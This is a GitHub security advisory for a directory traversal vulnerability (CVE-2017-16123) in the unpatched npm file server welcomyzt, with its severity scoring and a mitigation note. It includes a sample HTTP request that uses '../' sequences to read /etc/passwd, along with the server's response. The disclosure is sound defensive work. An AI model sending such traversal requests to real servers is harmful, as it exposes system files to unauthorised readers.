Skip to content

Directory Traversal in welcomyzt

High severity GitHub Reviewed Published Sep 1, 2020 to the GitHub Advisory Database • Updated Sep 11, 2023

Package

npm welcomyzt (npm)

Affected versions

>= 0.0.0

Patched versions

None

Description

welcomyzt is a simple file server.

welcomyzt is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing ../ in the url.

Example request:

GET /../../../../../../../../../../etc/passwd HTTP/1.1
host: localhost

and server Response:

HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked

{contents of /etc/passwd}

Recommendation

No patch is available for this vulnerability.

It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.

References

Reviewed Aug 31, 2020
Published to the GitHub Advisory Database Sep 1, 2020
Last updated Sep 11, 2023

Severity

High
7.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Weaknesses

CVE ID

CVE-2017-16123

GHSA ID

GHSA-8fv7-vm2p-5495

Source code

No known source code
Checking history
See something to contribute? Suggest improvements for this vulnerability.